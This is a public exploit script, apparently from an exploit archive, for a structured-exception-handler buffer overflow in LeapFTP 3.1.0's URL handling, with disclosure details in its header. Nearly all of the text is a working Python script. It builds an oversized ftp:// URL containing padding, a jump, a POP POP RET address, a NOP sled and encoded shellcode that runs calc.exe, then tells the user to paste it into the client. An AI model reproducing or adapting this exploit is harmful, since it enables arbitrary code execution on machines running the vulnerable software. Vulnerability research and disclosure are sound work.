# Exploit Title: LeapFTP 3.1.0 URL Handling SEH Exploit # Google Dork: "k3170makan is totally awesome" hehehe # Date: 2014-08-28 # Exploit Author: k3170makan # Vendor Homepage: http://www.leapware.com/ # Software Link: http://www.leapware.com/download.html # Version: 3.1.0 # Tested on: Windows XP SP0 (DoS on Windows SP2, Windows 7) # Timeline: # * 2014-08-28 : Initial disclosure # * 2014-09-01 : no contact # * 2014-09-01 : public disclosure """ This vulnerability was disclosed according to the terms of my public disclosure policy ( http://blog.k3170makan.com/p/public-disclosure-policy.html) """ from sys import argv if __name__ == "__main__": ovTrigger = 1093 f = open("exploit.txt","w") f.write("ftp://") f.write("A"*ovTrigger) f.write("\xEB\x06\x90\x90") #JMP to payload f.write("\x44\xD3\x4A\x77") #POP POP RET f.write("\x90"*30) #msfpayload windows/exec CMD=calc.exe R | msfencode -e x86/alpha_mixed -c 1 -b \x00\x0a\x0d\xff shellcode = "\x89\xe0\xd9\xe8\xd9\x70\xf4\x5f\x57\x59\x49\x49\x49\x49" +\ "\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +\ "\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +\ "\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +\ "\x42\x75\x4a\x49\x49\x6c\x68\x68\x4f\x79\x35\x50\x53\x30" +\ "\x45\x50\x35\x30\x6e\x69\x79\x75\x30\x31\x6a\x72\x30\x64" +\ "\x4c\x4b\x53\x62\x56\x50\x4e\x6b\x76\x32\x56\x6c\x6c\x4b" +\ "\x42\x72\x62\x34\x6e\x6b\x54\x32\x46\x48\x76\x6f\x6e\x57" +\ "\x61\x5a\x67\x56\x45\x61\x39\x6f\x64\x71\x4b\x70\x4e\x4c" +\ "\x55\x6c\x53\x51\x33\x4c\x67\x72\x76\x4c\x51\x30\x59\x51" +\ "\x38\x4f\x64\x4d\x45\x51\x49\x57\x4d\x32\x58\x70\x56\x32" +\ "\x70\x57\x4e\x6b\x31\x42\x76\x70\x4e\x6b\x61\x52\x47\x4c" +\ "\x73\x31\x5a\x70\x4c\x4b\x57\x30\x53\x48\x6c\x45\x4f\x30" +\ "\x33\x44\x51\x5a\x65\x51\x48\x50\x42\x70\x6e\x6b\x72\x68" +\ "\x67\x68\x6c\x4b\x30\x58\x47\x50\x77\x71\x5a\x73\x49\x73" +\ "\x77\x4c\x71\x59\x6e\x6b\x35\x64\x4e\x6b\x57\x71\x4b\x66" +\ "\x35\x61\x4b\x4f\x34\x71\x4f\x30\x4e\x4c\x59\x51\x4a\x6f" +\ "\x74\x4d\x75\x51\x58\x47\x44\x78\x59\x70\x62\x55\x68\x74" +\ "\x33\x33\x61\x6d\x4b\x48\x65\x6b\x33\x4d\x47\x54\x72\x55" +\ "\x58\x62\x36\x38\x6e\x6b\x32\x78\x35\x74\x55\x51\x4a\x73" +\ "\x73\x56\x4e\x6b\x66\x6c\x72\x6b\x6e\x6b\x71\x48\x77\x6c" +\ "\x47\x71\x78\x53\x6e\x6b\x73\x34\x4e\x6b\x75\x51\x5a\x70" +\ "\x4b\x39\x77\x34\x35\x74\x71\x34\x31\x4b\x51\x4b\x75\x31" +\ "\x71\x49\x70\x5a\x66\x31\x4b\x4f\x39\x70\x43\x68\x43\x6f" +\ "\x53\x6a\x4c\x4b\x42\x32\x38\x6b\x4b\x36\x53\x6d\x42\x4a" +\ "\x36\x61\x4c\x4d\x4b\x35\x68\x39\x65\x50\x35\x50\x55\x50" +\ "\x70\x50\x52\x48\x76\x51\x6c\x4b\x62\x4f\x6c\x47\x79\x6f" +\ "\x6e\x35\x6f\x4b\x4a\x50\x4e\x55\x69\x32\x32\x76\x55\x38" +\ "\x79\x36\x6c\x55\x6f\x4d\x4d\x4d\x6b\x4f\x78\x55\x75\x6c" +\ "\x73\x36\x31\x6c\x57\x7a\x4b\x30\x79\x6b\x49\x70\x70\x75" +\ "\x64\x45\x4f\x4b\x63\x77\x37\x63\x62\x52\x52\x4f\x52\x4a" +\ "\x77\x70\x56\x33\x69\x6f\x4e\x35\x30\x63\x35\x31\x50\x6c" +\ "\x51\x73\x36\x4e\x45\x35\x44\x38\x33\x55\x53\x30\x41\x41" f.write(shellcode) f.flush() f.close() #copy contents of exploit.txt to your clipboard and then launch LeapFTP <http://about.me/k3170makan> Keith Makan <http://about.me/k3170makan> about.me/k3170makan <http://about.me/k3170makan>